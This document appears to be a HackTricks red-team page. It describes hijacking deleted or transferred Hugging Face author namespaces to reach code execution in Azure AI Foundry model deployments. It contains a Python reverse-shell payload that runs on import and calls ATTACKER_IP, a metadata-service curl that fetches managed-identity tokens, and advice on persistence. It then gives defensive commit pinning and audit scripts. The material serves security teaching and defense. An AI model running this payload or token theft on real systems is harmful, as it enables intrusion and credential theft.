Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Scenario

  • The Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment.
  • HF model identifiers are Author/ModelName. If the HF author/organization is deleted, anyone can re-register that name and publish a model with the same ModelName at the legacy path.
  • Pipelines and catalogs that pull by name only (no commit pinning or integrity check) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, yielding RCE with that endpoint's permissions.

Common HF takeover cases:

  • Ownership deletion: the old path returns 404 until takeover.
  • Ownership transfer: the old path returns 307 to the new author while the old author still exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker's repo is served at the legacy path.

Identifying Reusable Namespaces (HF)

```bash
# Check author/org existence
curl -I https://huggingface.co/<Author>        # 200 exists, 404 deleted/available

# Check model path
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 -> redirect (transfer case), 404 -> deleted until takeover
```

End-to-End Attack Flow against Azure AI Foundry

  1. In the Model Catalog, find HF models whose original authors have been deleted or transferred (old author removed) on HF.
  2. Re-register the abandoned author on HF and recreate the ModelName.
  3. Publish a malicious repo with loader code that executes at import time or requires trust_remote_code=True.
  4. Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; the loader executes inside the Azure endpoint container/VM, yielding RCE with the endpoint's permissions.

Example payload fragment executed on import (for demonstration only):

```python
# __init__.py or a module imported by the model loader
import os, socket, subprocess, threading

def _rs(host, port):
    s = socket.socket(); s.connect((host, port))
    for fd in (0,1,2):
        try:
            os.dup2(s.fileno(), fd)
        except Exception:
            pass
    subprocess.call(["/bin/sh","-i"])  # or powershell on Windows images

if os.environ.get("AZUREML_ENDPOINT","1") == "1":
    threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```

Notes

  • AI Foundry deployments that wrap HF models typically clone and import the repo modules referenced by the model config (e.g., auto_map), which can lead to code execution. Some paths require trust_remote_code=True.
  • Access typically corresponds to the endpoint's managed identity/service principal permissions. Treat this as an initial-access foothold for data access and lateral movement within Azure.

Post-Exploitation Tips (Azure Endpoint)

  • Enumerate environment variables and the MSI endpoints for tokens:
```bash
# Azure Instance Metadata Service (inside Azure compute)
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
  • Inspect mounted storage, model artifacts, and Azure services reachable with the token you obtained.
  • Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF.

Defensive Guidance for Azure AI Foundry Users

  • Pin models to a commit when loading from HF:
```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
  • Mirror verified HF models into a trusted internal registry and deploy from there.
  • Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName values that have been deleted or transferred; update or pin them.
  • Verify author existence and model provenance before deployment.
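An added example (not from the original page) of the codebase scan recommended above: an AST-based check that flags hard-coded Author/ModelName loads in Python source that are not pinned to a full commit hash via revision=, and notes when trust_remote_code=True is also set. The function names and the sample source are assumptions made for this example.

```python
import ast
import re
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")
HUB_ID_RE = re.compile(r"[A-Za-z0-9][\w.-]*/[\w.-]+")  # Author/ModelName, not a local path

def _str(node):
    # Literal string of a constant node, else None (non-literal ids are skipped)
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None

def find_unpinned_loads(source, filename="<constructed>"):
    """Return sorted (line, model_id, reason) tuples for every *.from_pretrained()
    call that loads a hub id without pinning revision= to a full commit hash."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr == "from_pretrained"):
            continue
        # Model id is the first positional arg or pretrained_model_name_or_path=
        model_id = _str(node.args[0]) if node.args else None
        revision, remote_code = None, False
        for kw in node.keywords:
            if kw.arg == "pretrained_model_name_or_path":
                model_id = _str(kw.value)
            elif kw.arg == "revision":
                revision = _str(kw.value)
            elif kw.arg == "trust_remote_code":
                remote_code = isinstance(kw.value, ast.Constant) and kw.value.value is True
        if not model_id or not HUB_ID_RE.fullmatch(model_id):
            continue  # local paths and non-literal ids are out of scope here
        if revision is None:
            reason = "no revision=: resolves to whatever the name currently points at"
        elif not COMMIT_RE.match(revision):
            reason = f"revision={revision!r} is a branch/tag, not a commit hash"
        else:
            continue  # pinned to a commit: a re-registered namespace cannot swap it
        if remote_code:
            reason += " (and trust_remote_code=True, so repo loader code will run)"
        findings.append((node.lineno, model_id, reason))
    return sorted(findings)

# Constructed sample source (not from any real project)
SAMPLE = '''
a = AutoModel.from_pretrained("Author/ModelName")
b = AutoModel.from_pretrained("Author/ModelName", revision="main")
c = AutoModel.from_pretrained("Author/ModelName", revision="0123456789abcdef0123456789abcdef01234567")
d = AutoTokenizer.from_pretrained("./local-dir")
e = AutoModel.from_pretrained(pretrained_model_name_or_path="Org/Other", trust_remote_code=True)
'''
```

Run `find_unpinned_loads(open(path).read(), path)` over each Python file in a repo; only `c` and the local-path load in the sample pass.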

Detection Rules (HTTP)

  • Deleted author: the author page returns 404; the legacy model path returns 404 until takeover.
  • Transferred model: the legacy path returns 307 to the new author while the old author still exists; if the old author is later deleted and re-registered, the legacy path will serve attacker content.
```bash
curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"
```
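A small audit helper, added here and not part of the original page, that applies the HEAD checks from the "Identifying Reusable Namespaces" section and the detection rules above to the Author/ModelName identifiers your own deployments reference. Redirects are deliberately not followed so the 307 transfer case stays visible; the function names are assumptions made for this example.

```python
import urllib.error
import urllib.request

HF = "https://huggingface.co"

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Do not follow 3xx: we want to see the 307 that marks a transferred model
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

_opener = urllib.request.build_opener(_NoRedirect)

def head(url, timeout=10):
    """HEAD the URL; return (status, Location header or None) without following redirects."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with _opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:  # 3xx/4xx land here because redirects are not followed
        return e.code, e.headers.get("Location")

def classify(author_status, model_status, location=None):
    """Map (author page status, model page status) onto the takeover cases above."""
    if model_status in (301, 302, 307, 308):
        parts = (location or "").rstrip("/").split("/")
        new_author = parts[-2] if len(parts) >= 2 else "?"
        return f"transferred: legacy path redirects to {new_author}; at risk if the old author is later deleted"
    if author_status == 404:
        return "author-deleted: namespace is free to re-register, legacy path would serve a newcomer's repo"
    if author_status == 200 and model_status == 404:
        return "model-deleted: author still exists, only the model path is free"
    if author_status == 200 and model_status == 200:
        return "active: served by the current author (still pin to a commit)"
    return f"unknown: author={author_status} model={model_status}"

def check(author, model):
    """Live check of one Author/ModelName identifier (needs network access)."""
    a_status, _ = head(f"{HF}/{author}")
    m_status, location = head(f"{HF}/{author}/{model}")
    return classify(a_status, m_status, location)

if __name__ == "__main__":
    import sys
    author, model = sys.argv[1].split("/", 1)  # e.g. Author/ModelName
    print(check(author, model))
```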

Related References

  • See the broader methodology and supply-chain notes:

Pentesting Cloud Methodology
